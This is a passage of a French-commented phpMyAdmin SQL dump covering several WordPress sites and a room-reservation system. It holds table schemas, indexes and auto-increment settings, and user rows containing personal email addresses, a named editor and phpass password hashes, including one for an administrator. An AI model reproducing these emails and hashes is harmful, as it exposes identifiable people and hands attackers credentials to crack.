  `id` int(11) NOT NULL,
  `thumbnail_url` varchar(1024) NOT NULL,
  `url` varchar(1024) NOT NULL,
  `slideshow_name` varchar(1024) DEFAULT 'default',
  `link` varchar(1024) NOT NULL DEFAULT 'http://',
  `description` varchar(5120) NOT NULL,
  `position` int(11) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Structure de la table `www_termmeta`
--

CREATE TABLE `www_termmeta` (
  `meta_id` bigint(20) UNSIGNED NOT NULL,
  `term_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Structure de la table `www_terms`
--

CREATE TABLE `www_terms` (
  `term_id` bigint(20) UNSIGNED NOT NULL,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www_terms`
--

INSERT INTO `www_terms` (`term_id`, `name`, `slug`, `term_group`) VALUES
(1, 'Uncategorized', 'uncategorized', 0),
(2, 'Navigation', 'navigation', 0),
(3, 'test', 'test', 0);

-- --------------------------------------------------------

--
-- Structure de la table `www_term_relationships`
--

CREATE TABLE `www_term_relationships` (
  `object_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `term_taxonomy_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `term_order` int(11) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www_term_relationships`
--

INSERT INTO `www_term_relationships` (`object_id`, `term_taxonomy_id`, `term_order`) VALUES
(1, 1, 0),
(16, 2, 0),
(15, 2, 0),
(425, 2, 0),
(24, 2, 0),
(25, 2, 0),
(150, 4, 0),
(150, 3, 0),
(148, 4, 0),
(148, 3, 0),
(362, 2, 0),
(387, 2, 0);

-- --------------------------------------------------------

--
-- Structure de la table `www_term_taxonomy`
--

CREATE TABLE `www_term_taxonomy` (
  `term_taxonomy_id` bigint(20) UNSIGNED NOT NULL,
  `term_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `count` bigint(20) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www_term_taxonomy`
--

INSERT INTO `www_term_taxonomy` (`term_taxonomy_id`, `term_id`, `taxonomy`, `description`, `parent`, `count`) VALUES
(1, 1, 'category', '', 0, 1),
(2, 2, 'nav_menu', '', 0, 7),
(3, 3, 'collaborateur_worksite', '', 0, 2),
(4, 3, 'collaborateur_service', '', 0, 2);

-- --------------------------------------------------------

--
-- Structure de la table `www_usermeta`
--

CREATE TABLE `www_usermeta` (
  `umeta_id` bigint(20) UNSIGNED NOT NULL,
  `user_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www_usermeta`
--

INSERT INTO `www_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(1, 1, 'first_name', ''),
(2, 1, 'last_name', ''),
(3, 1, 'nickname', 'admin'),
(4, 1, 'description', ''),
(5, 1, 'rich_editing', 'true'),
(6, 1, 'comment_shortcuts', 'false'),
(7, 1, 'admin_color', 'fresh'),
(8, 1, 'use_ssl', '0'),
(9, 1, 'show_admin_bar_front', 'true'),
(10, 1, 'www_capabilities', 'a:2:{s:13:\"administrator\";b:1;s:26:\"total_slider_manage_slides\";b:1;}'),
(11, 1, 'www_user_level', '10'),
(12, 1, 'dismissed_wp_pointers', 'wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media,total-slider-help-pointer'),
(13, 1, 'show_welcome_panel', '1'),
(14, 1, 'www_dashboard_quick_press_last_post_id', '357'),
(15, 1, 'managenav-menuscolumnshidden', 'a:4:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";}'),
(16, 1, 'metaboxhidden_nav-menus', 'a:2:{i:0;s:8:\"add-post\";i:1;s:12:\"add-post_tag\";}'),
(17, 1, 'www_user-settings', 'hidetb=1&libraryContent=upload&editor=html&wplink=1'),
(18, 1, 'www_user-settings-time', '1383585504'),
(19, 1, 'nav_menu_recently_edited', '2'),
(20, 2, 'first_name', 'Julie'),
(21, 2, 'last_name', 'Pierrard'),
(22, 2, 'nickname', 'Julie'),
(23, 2, 'description', ''),
(24, 2, 'rich_editing', 'true'),
(25, 2, 'comment_shortcuts', 'false'),
(26, 2, 'admin_color', 'fresh'),
(27, 2, 'use_ssl', '0'),
(28, 2, 'show_admin_bar_front', 'true'),
(29, 2, 'www_capabilities', 'a:1:{s:6:\"editor\";b:1;}'),
(30, 2, 'www_user_level', '7'),
(31, 2, 'dismissed_wp_pointers', 'wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media'),
(32, 2, 'www_dashboard_quick_press_last_post_id', '355'),
(33, 2, 'www_user-settings', 'editor=tinymce&hidetb=1'),
(34, 2, 'www_user-settings-time', '1377249565');

-- --------------------------------------------------------

--
-- Structure de la table `www_users`
--

CREATE TABLE `www_users` (
  `ID` bigint(20) UNSIGNED NOT NULL,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(64) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(60) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT '0',
  `display_name` varchar(250) NOT NULL DEFAULT ''
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www_users`
--

INSERT INTO `www_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES
(1, 'admin', '$P$BTxsluD39ZNDDlm.YtLuQVMqrm.eH0/', 'admin', 'dpierrard@gmail.com', '', '2013-05-23 18:04:49', '', 0, 'admin'),
(2, 'Julie', '$P$Bt7mKBueNKtwennKgBdPjcBVCcppHC0', 'julie', 'juliepierrard@hotmail.com', '', '2013-08-23 09:08:58', '', 0, 'Julie Pierrard');

--
-- Index pour les tables déchargées
--

--
-- Index pour la table `ct_commentmeta`
--
ALTER TABLE `ct_commentmeta`
  ADD PRIMARY KEY (`meta_id`),
  ADD KEY `comment_id` (`comment_id`),
  ADD KEY `meta_key` (`meta_key`(191));

--
-- Index pour la table `ct_comments`
--
ALTER TABLE `ct_comments`
  ADD PRIMARY KEY (`comment_ID`),
  ADD KEY `comment_post_ID` (`comment_post_ID`),
  ADD KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  ADD KEY `comment_date_gmt` (`comment_date_gmt`),
  ADD KEY `comment_parent` (`comment_parent`),
  ADD KEY `comment_author_email` (`comment_author_email`(10));

--
-- Index pour la table `ct_links`
--
ALTER TABLE `ct_links`
  ADD PRIMARY KEY (`link_id`),
  ADD KEY `link_visible` (`link_visible`);

--
-- Index pour la table `ct_options`
--
ALTER TABLE `ct_options`
  ADD PRIMARY KEY (`option_id`),
  ADD UNIQUE KEY `option_name` (`option_name`);

--
-- Index pour la table `ct_postmeta`
--
ALTER TABLE `ct_postmeta`
  ADD PRIMARY KEY (`meta_id`),
  ADD KEY `post_id` (`post_id`),
  ADD KEY `meta_key` (`meta_key`(191));

--
-- Index pour la table `ct_posts`
--
ALTER TABLE `ct_posts`
  ADD PRIMARY KEY (`ID`),
  ADD KEY `post_name` (`post_name`(191)),
  ADD KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  ADD KEY `post_parent` (`post_parent`),
  ADD KEY `post_author` (`post_author`);

--
-- Index pour la table `ct_termmeta`
--
ALTER TABLE `ct_termmeta`
  ADD PRIMARY KEY (`meta_id`),
  ADD KEY `term_id` (`term_id`),
  ADD KEY `meta_key` (`meta_key`(191));

--
-- Index pour la table `ct_terms`
--
ALTER TABLE `ct_terms`
  ADD PRIMARY KEY (`term_id`),
  ADD KEY `slug` (`slug`(191)),
  ADD KEY `name` (`name`(191));

--
-- Index pour la table `ct_term_relationships`
--
ALTER TABLE `ct_term_relationships`
  ADD PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  ADD KEY `term_taxonomy_id` (`term_taxonomy_id`);

--
-- Index pour la table `ct_term_taxonomy`
--
ALTER TABLE `ct_term_taxonomy`
  ADD PRIMARY KEY (`term_taxonomy_id`),
  ADD UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  ADD KEY `taxonomy` (`taxonomy`);

--
-- Index pour la table `ct_usermeta`
--
ALTER TABLE `ct_usermeta`
  ADD PRIMARY KEY (`umeta_id`),
  ADD KEY `user_id` (`user_id`),
  ADD KEY `meta_key` (`meta_key`(191));

--
-- Index pour la table `ct_users`
--
ALTER TABLE `ct_users`
  ADD PRIMARY KEY (`ID`),
  ADD KEY `user_login_key` (`user_login`),
  ADD KEY `user_nicename` (`user_nicename`),
  ADD KEY `user_email` (`user_email`);

--
-- Index pour la table `reservation_client`
--
ALTER TABLE `reservation_client`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `email` (`email`);

--
-- Index pour la table `reservation_panier`
--
ALTER TABLE `reservation_panier`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `reservation_reservation`
--
ALTER TABLE `reservation_reservation`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `reservation_reservation_bck`
--
ALTER TABLE `reservation_reservation_bck`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `reservation_salle`
--
ALTER TABLE `reservation_salle`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `reservation_seance_complete`
--
ALTER TABLE `reservation_seance_complete`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `reservation_seance_complete_bck`
--
ALTER TABLE `reservation_seance_complete_bck`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `reservation_seance_exceptionnelle`
--
ALTER TABLE `reservation_seance_exceptionnelle`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `reservation_seance_exceptionnelle_bck`
--
ALTER TABLE `reservation_seance_exceptionnelle_bck`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `reservation_seance_type`
--
ALTER TABLE `reservation_seance_type`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `wp_commentmeta`
--
ALTER TABLE `wp_commentmeta`
  ADD PRIMARY KEY (`meta_id`),
  ADD KEY `comment_id` (`comment_id`),
  ADD KEY `meta_key` (`meta_key`(191));

--
-- Index pour la table `wp_comments`
--
ALTER TABLE `wp_comments`
  ADD PRIMARY KEY (`comment_ID`),
  ADD KEY `comment_post_ID` (`comment_post_ID`),
  ADD KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  ADD KEY `comment_date_gmt` (`comment_date_gmt`),
  ADD KEY `comment_parent` (`comment_parent`),
  ADD KEY `comment_author_email` (`comment_author_email`(10));

--
-- Index pour la table `wp_links`
--
ALTER TABLE `wp_links`
  ADD PRIMARY KEY (`link_id`),
  ADD KEY `link_visible` (`link_visible`);

--
-- Index pour la table `wp_options`
--
ALTER TABLE `wp_options`
  ADD PRIMARY KEY (`option_id`),
  ADD UNIQUE KEY `option_name` (`option_name`);

--
-- Index pour la table `wp_postmeta`
--
ALTER TABLE `wp_postmeta`
  ADD PRIMARY KEY (`meta_id`),
  ADD KEY `post_id` (`post_id`),
  ADD KEY `meta_key` (`meta_key`(191));

--
-- Index pour la table `wp_posts`
--
ALTER TABLE `wp_posts`
  ADD PRIMARY KEY (`ID`),
  ADD KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  ADD KEY `post_parent` (`post_parent`),
  ADD KEY `post_author` (`post_author`),
  ADD KEY `post_name` (`post_name`(191));

--
-- Index pour la table `wp_termmeta`
--
ALTER TABLE `wp_termmeta`
  ADD PRIMARY KEY (`meta_id`),
  ADD KEY `term_id` (`term_id`),
  ADD KEY `meta_key` (`meta_key`(191));

--
-- Index pour la table `wp_terms`
--
ALTER TABLE `wp_terms`
  ADD PRIMARY KEY (`term_id`),
  ADD KEY `slug` (`slug`(191)),
  ADD KEY `name` (`name`(191));

--
-- Index pour la table `wp_term_relationships`
--
ALTER TABLE `wp_term_relationships`
  ADD PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  ADD KEY `term_taxonomy_id` (`term_taxonomy_id`);

--
-- Index pour la table `wp_term_taxonomy`
--
ALTER TABLE `wp_term_taxonomy`
  ADD PRIMARY KEY (`term_taxonomy_id`),
  ADD UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  ADD KEY `taxonomy` (`taxonomy`);

--
-- Index pour la table `wp_usermeta`
--
ALTER TABLE `wp_usermeta`
  ADD PRIMARY KEY (`umeta_id`),
  ADD KEY `user_id` (`user_id`),
  ADD KEY `meta_key` (`meta_key`(191));

--
-- Index pour la table `wp_users`
--
ALTER TABLE `wp_users`
  ADD PRIMARY KEY (`ID`),
  ADD KEY `user_login_key` (`user_login`),
  ADD KEY `user_nicename` (`user_nicename`),
  ADD KEY `user_email` (`user_email`);

--
-- Index pour la table `wp_wfBadLeechers`
--
ALTER TABLE `wp_wfBadLeechers`
  ADD PRIMARY KEY (`eMin`,`IP`);

--
-- Index pour la table `wp_wfBlockedIPLog`
--
ALTER TABLE `wp_wfBlockedIPLog`
  ADD PRIMARY KEY (`IP`,`unixday`);

--
-- Index pour la table `wp_wfBlocks`
--
ALTER TABLE `wp_wfBlocks`
  ADD PRIMARY KEY (`IP`),
  ADD KEY `k1` (`wfsn`);

--
-- Index pour la table `wp_wfBlocksAdv`
--
ALTER TABLE `wp_wfBlocksAdv`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `wp_wfConfig`
--
ALTER TABLE `wp_wfConfig`
  ADD PRIMARY KEY (`name`);

--
-- Index pour la table `wp_wfCrawlers`
--
ALTER TABLE `wp_wfCrawlers`
  ADD PRIMARY KEY (`IP`,`patternSig`);

--
-- Index pour la table `wp_wfFileMods`
--
ALTER TABLE `wp_wfFileMods`
  ADD PRIMARY KEY (`filenameMD5`);

--
-- Index pour la table `wp_wfHits`
--
ALTER TABLE `wp_wfHits`
  ADD PRIMARY KEY (`id`),
  ADD KEY `k1` (`ctime`),
  ADD KEY `k2` (`IP`,`ctime`);

--
-- Index pour la table `wp_wfHoover`
--
ALTER TABLE `wp_wfHoover`
  ADD PRIMARY KEY (`id`),
  ADD KEY `k2` (`hostKey`);

--
-- Index pour la table `wp_wfIssues`
--
ALTER TABLE `wp_wfIssues`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `wp_wfLeechers`
--
ALTER TABLE `wp_wfLeechers`
  ADD PRIMARY KEY (`eMin`,`IP`);

--
-- Index pour la table `wp_wfLockedOut`
--
ALTER TABLE `wp_wfLockedOut`
  ADD PRIMARY KEY (`IP`);

--
-- Index pour la table `wp_wfLocs`
--
ALTER TABLE `wp_wfLocs`
  ADD PRIMARY KEY (`IP`);

--
-- Index pour la table `wp_wfLogins`
--
ALTER TABLE `wp_wfLogins`
  ADD PRIMARY KEY (`id`),
  ADD KEY `k1` (`IP`,`fail`);

--
-- Index pour la table `wp_wfNet404s`
--
ALTER TABLE `wp_wfNet404s`
  ADD PRIMARY KEY (`sig`),
  ADD KEY `k1` (`ctime`);

--
-- Index pour la table `wp_wfReverseCache`
--
ALTER TABLE `wp_wfReverseCache`
  ADD PRIMARY KEY (`IP`);

--
-- Index pour la table `wp_wfScanners`
--
ALTER TABLE `wp_wfScanners`
  ADD PRIMARY KEY (`eMin`,`IP`);

--
-- Index pour la table `wp_wfStatus`
--
ALTER TABLE `wp_wfStatus`
  ADD PRIMARY KEY (`id`),
  ADD KEY `k1` (`ctime`),
  ADD KEY `k2` (`type`);

--
-- Index pour la table `wp_wfThrottleLog`
--
ALTER TABLE `wp_wfThrottleLog`
  ADD PRIMARY KEY (`IP`),
  ADD KEY `k2` (`endTime`);

--
-- Index pour la table `wp_wfVulnScanners`
--
ALTER TABLE `wp_wfVulnScanners`
  ADD PRIMARY KEY (`IP`);

--
-- Index pour la table `www2_commentmeta`
--
ALTER TABLE `www2_commentmeta`
  ADD PRIMARY KEY (`meta_id`),
  ADD KEY `comment_id` (`comment_id`),
  ADD KEY `meta_key` (`meta_key`);

--
-- Index pour la table `www2_comments`
--
ALTER TABLE `www2_comments`
  ADD PRIMARY KEY (`comment_ID`),
  ADD KEY `comment_post_ID` (`comment_post_ID`),
  ADD KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  ADD KEY `comment_date_gmt` (`comment_date_gmt`),
  ADD KEY `comment_parent` (`comment_parent`);

--
-- Index pour la table `www2_duplicator_packages`
--
ALTER TABLE `www2_duplicator_packages`
  ADD PRIMARY KEY (`id`),
  ADD KEY `hash` (`hash`);

--
-- Index pour la table `www2_links`
--
ALTER TABLE `www2_links`
  ADD PRIMARY KEY (`link_id`),
  ADD KEY `link_visible` (`link_visible`);

--
-- Index pour la table `www2_options`
--
ALTER TABLE `www2_options`
  ADD PRIMARY KEY (`option_id`),
  ADD UNIQUE KEY `option_name` (`option_name`);

--
-- Index pour la table `www2_postmeta`
--
ALTER TABLE `www2_postmeta`
  ADD PRIMARY KEY (`meta_id`),
  ADD KEY `post_id` (`post_id`),
  ADD KEY `meta_key` (`meta_key`);

--
-- Index pour la table `www2_posts`
--
ALTER TABLE `www2_posts`
  ADD PRIMARY KEY (`ID`),
  ADD KEY `post_name` (`post_name`),
  ADD KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  ADD KEY `post_parent` (`post_parent`),
  ADD KEY `post_author` (`post_author`);

--
-- Index pour la table `www2_post_relationships`
--
ALTER TABLE `www2_post_relationships`
  ADD PRIMARY KEY (`relate_id`),
  ADD KEY `post_id` (`post_id`),
  ADD KEY `has_post_id` (`has_post_id`);

--
-- Index pour la table `www2_slideshow_plugin`
--
ALTER TABLE `www2_slideshow_plugin`
  ADD UNIQUE KEY `id` (`id`);

--
-- Index pour la table `www2_termmeta`
--
ALTER TABLE `www2_termmeta`
  ADD PRIMARY KEY (`meta_id`),
  ADD KEY `term_id` (`term_id`),
  ADD KEY `meta_key` (`meta_key`);

--
-- Index pour la table `www2_terms`
--
ALTER TABLE `www2_terms`
  ADD PRIMARY KEY (`term_id`),
  ADD UNIQUE KEY `slug` (`slug`),
  ADD KEY `name` (`name`);

--
-- Index pour la table `www2_term_relationships`
--
ALTER TABLE `www2_term_relationships`
  ADD PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  ADD KEY `term_taxonomy_id` (`term_taxonomy_id`);

--
-- Index pour la table `www2_term_taxonomy`
--
ALTER TABLE `www2_term_taxonomy`
  ADD PRIMARY KEY (`term_taxonomy_id`),
  ADD UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  ADD KEY `taxonomy` (`taxonomy`);

--
-- Index pour la table `www2_usermeta`
--
ALTER TABLE `www2_usermeta`
  ADD PRIMARY KEY (`umeta_id`),
  ADD KEY `user_id` (`user_id`),
  ADD KEY `meta_key` (`meta_key`);

--
-- Index pour la table `www2_users`
--
ALTER TABLE `www2_users`
  ADD PRIMARY KEY (`ID`),
  ADD KEY `user_login_key` (`user_login`),
  ADD KEY `user_nicename` (`user_nicename`);

--
-- Index pour la table `www2_wfBadLeechers`
--
ALTER TABLE `www2_wfBadLeechers`
  ADD PRIMARY KEY (`eMin`,`IP`);

--
-- Index pour la table `www2_wfBlockedIPLog`
--
ALTER TABLE `www2_wfBlockedIPLog`
  ADD PRIMARY KEY (`IP`,`unixday`);

--
-- Index pour la table `www2_wfBlocks`
--
ALTER TABLE `www2_wfBlocks`
  ADD PRIMARY KEY (`IP`),
  ADD KEY `k1` (`wfsn`);

--
-- Index pour la table `www2_wfBlocksAdv`
--
ALTER TABLE `www2_wfBlocksAdv`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `www2_wfConfig`
--
ALTER TABLE `www2_wfConfig`
  ADD PRIMARY KEY (`name`);

--
-- Index pour la table `www2_wfCrawlers`
--
ALTER TABLE `www2_wfCrawlers`
  ADD PRIMARY KEY (`IP`,`patternSig`);

--
-- Index pour la table `www2_wfFileMods`
--
ALTER TABLE `www2_wfFileMods`
  ADD PRIMARY KEY (`filenameMD5`);

--
-- Index pour la table `www2_wfHits`
--
ALTER TABLE `www2_wfHits`
  ADD PRIMARY KEY (`id`),
  ADD KEY `k1` (`ctime`),
  ADD KEY `k2` (`IP`,`ctime`);

--
-- Index pour la table `www2_wfHoover`
--
ALTER TABLE `www2_wfHoover`
  ADD PRIMARY KEY (`id`),
  ADD KEY `k2` (`hostKey`);

--
-- Index pour la table `www2_wfIssues`
--
ALTER TABLE `www2_wfIssues`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `www2_wfLeechers`
--
ALTER TABLE `www2_wfLeechers`
  ADD PRIMARY KEY (`eMin`,`IP`);

--
-- Index pour la table `www2_wfLockedOut`
--
ALTER TABLE `www2_wfLockedOut`
  ADD PRIMARY KEY (`IP`);

--
-- Index pour la table `www2_wfLocs`
--
ALTER TABLE `www2_wfLocs`
  ADD PRIMARY KEY (`IP`);

--
-- Index pour la table `www2_wfLogins`
--
ALTER TABLE `www2_wfLogins`
  ADD PRIMARY KEY (`id`),
  ADD KEY `k1` (`IP`,`fail`);

--
-- Index pour la table `www2_wfNet404s`
--
ALTER TABLE `www2_wfNet404s`
  ADD PRIMARY KEY (`sig`),
  ADD KEY `k1` (`ctime`);

--
-- Index pour la table `www2_wfReverseCache`
--
ALTER TABLE `www2_wfReverseCache`
  ADD PRIMARY KEY (`IP`);

--
-- Index pour la table `www2_wfScanners`
--
ALTER TABLE `www2_wfScanners`
  ADD PRIMARY KEY (`eMin`,`IP`);

--
-- Index pour la table `www2_wfStatus`
--
ALTER TABLE `www2_wfStatus`
  ADD PRIMARY KEY (`id`),
  ADD KEY `k1` (`ctime`),
  ADD KEY `k2` (`type`);

--
-- Index pour la table `www2_wfThrottleLog`
--
ALTER TABLE `www2_wfThrottleLog`
  ADD PRIMARY KEY (`IP`),
  ADD KEY `k2` (`endTime`);

--
-- Index pour la table `www2_wfVulnScanners`
--
ALTER TABLE `www2_wfVulnScanners`
  ADD PRIMARY KEY (`IP`);

--
-- Index pour la table `www_commentmeta`
--
ALTER TABLE `www_commentmeta`
  ADD PRIMARY KEY (`meta_id`),
  ADD KEY `comment_id` (`comment_id`),
  ADD KEY `meta_key` (`meta_key`);

--
-- Index pour la table `www_comments`
--
ALTER TABLE `www_comments`
  ADD PRIMARY KEY (`comment_ID`),
  ADD KEY `comment_post_ID` (`comment_post_ID`),
  ADD KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  ADD KEY `comment_date_gmt` (`comment_date_gmt`),
  ADD KEY `comment_parent` (`comment_parent`);

--
-- Index pour la table `www_links`
--
ALTER TABLE `www_links`
  ADD PRIMARY KEY (`link_id`),
  ADD KEY `link_visible` (`link_visible`);

--
-- Index pour la table `www_options`
--
ALTER TABLE `www_options`
  ADD PRIMARY KEY (`option_id`),
  ADD UNIQUE KEY `option_name` (`option_name`);

--
-- Index pour la table `www_postmeta`
--
ALTER TABLE `www_postmeta`
  ADD PRIMARY KEY (`meta_id`),
  ADD KEY `post_id` (`post_id`),
  ADD KEY `meta_key` (`meta_key`);

--
-- Index pour la table `www_posts`
--
ALTER TABLE `www_posts`
  ADD PRIMARY KEY (`ID`),
  ADD KEY `post_name` (`post_name`),
  ADD KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  ADD KEY `post_parent` (`post_parent`),
  ADD KEY `post_author` (`post_author`);

--
-- Index pour la table `www_post_relationships`
--
ALTER TABLE `www_post_relationships`
  ADD PRIMARY KEY (`relate_id`),
  ADD KEY `post_id` (`post_id`),
  ADD KEY `has_post_id` (`has_post_id`);

--
-- Index pour la table `www_slideshow_plugin`
--
ALTER TABLE `www_slideshow_plugin`
  ADD UNIQUE KEY `id` (`id`);

--
-- Index pour la table `www_termmeta`
--
ALTER TABLE `www_termmeta`
  ADD PRIMARY KEY (`meta_id`),
  ADD KEY `term_id` (`term_id`),
  ADD KEY `meta_key` (`meta_key`);

--
-- Index pour la table `www_terms`
--
ALTER TABLE `www_terms`
  ADD PRIMARY KEY (`term_id`),
  ADD UNIQUE KEY `slug` (`slug`),
  ADD KEY `name` (`name`);

--
-- Index pour la table `www_term_relationships`
--
ALTER TABLE `www_term_relationships`
  ADD PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  ADD KEY `term_taxonomy_id` (`term_taxonomy_id`);

--
-- Index pour la table `www_term_taxonomy`
--
ALTER TABLE `www_term_taxonomy`
  ADD PRIMARY KEY (`term_taxonomy_id`),
  ADD UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  ADD KEY `taxonomy` (`taxonomy`);

--
-- Index pour la table `www_usermeta`
--
ALTER TABLE `www_usermeta`
  ADD PRIMARY KEY (`umeta_id`),
  ADD KEY `user_id` (`user_id`),
  ADD KEY `meta_key` (`meta_key`);

--
-- Index pour la table `www_users`
--
ALTER TABLE `www_users`
  ADD PRIMARY KEY (`ID`),
  ADD KEY `user_login_key` (`user_login`),
  ADD KEY `user_nicename` (`user_nicename`);

--
-- AUTO_INCREMENT pour les tables déchargées
--

--
-- AUTO_INCREMENT pour la table `ct_commentmeta`
--
ALTER TABLE `ct_commentmeta`
  MODIFY `meta_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT pour la table `ct_comments`
--
ALTER TABLE `ct_comments`
  MODIFY `comment_ID` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;
--
-- AUTO_INCREMENT pour la table `ct_links`
--
ALTER TABLE `ct_links`
  MODIFY `link_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT pour la table `ct_options`
--
ALTER TABLE `ct_options`
  MODIFY `option_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=236;
--
-- AUTO_INCREMENT pour la table `ct_postmeta`
--
ALTER TABLE `ct_postmeta`
  MODIFY `meta_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=50;
--
-- AUTO_INCREMENT pour la table `ct_posts`
--
ALTER TABLE `ct_posts`
  MODIFY `ID` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=22;
--
-- AUTO_INCREMENT pour la table `ct_termmeta`
--
ALTER TABLE `ct_termmeta`
  MODIFY `meta_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT pour la table `ct_terms`
--
ALTER TABLE `ct_terms`
  MODIFY `term_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
--
-- AUTO_INCREMENT pour la table `ct_term_taxonomy`
--
ALTER TABLE `ct_term_taxonomy`
  MODIFY `term_taxonomy_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
--
-- AUTO_INCREMENT pour la table `ct_usermeta`
--
ALTER TABLE `ct_usermeta`
  MODIFY `umeta_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=19;
--
-- AUTO_INCREMENT pour la table `ct_users`
--
ALTER TABLE `ct_users`
  MODIFY `ID` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;
--
-- AUTO_INCREMENT pour la table `reservation_client`
--
ALTER TABLE `reservation_client`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=417;
--
-- AUTO_INCREMENT pour la table `reservation_panier`
--
ALTER TABLE `reservation_panier`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT pour la table `reservation_reservation`
--
ALTER TABLE `reservation_reservation`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=15661;
--
-- AUTO_INCREMENT pour la table `reservation_reservation_bck`
--
ALTER TABLE `reservation_reservation_bck`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=10118;
--
-- AUTO_INCREMENT pour la table `reservation_seance_complete`
--
ALTER TABLE `reservation_seance_complete`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=223;
--
-- AUTO_INCREMENT pour la table `reservation_seance_complete_bck`
--
ALTER TABLE `reservation_seance_complete_bck`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=220;
--
-- AUTO_INCREMENT pour la table `reservation_seance_exceptionnelle`
--
ALTER TABLE `reservation_seance_exceptionnelle`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=125;
--
-- AUTO_INCREMENT pour la table `reservation_seance_exceptionnelle_bck`
--
ALTER TABLE `reservation_seance_exceptionnelle_bck`
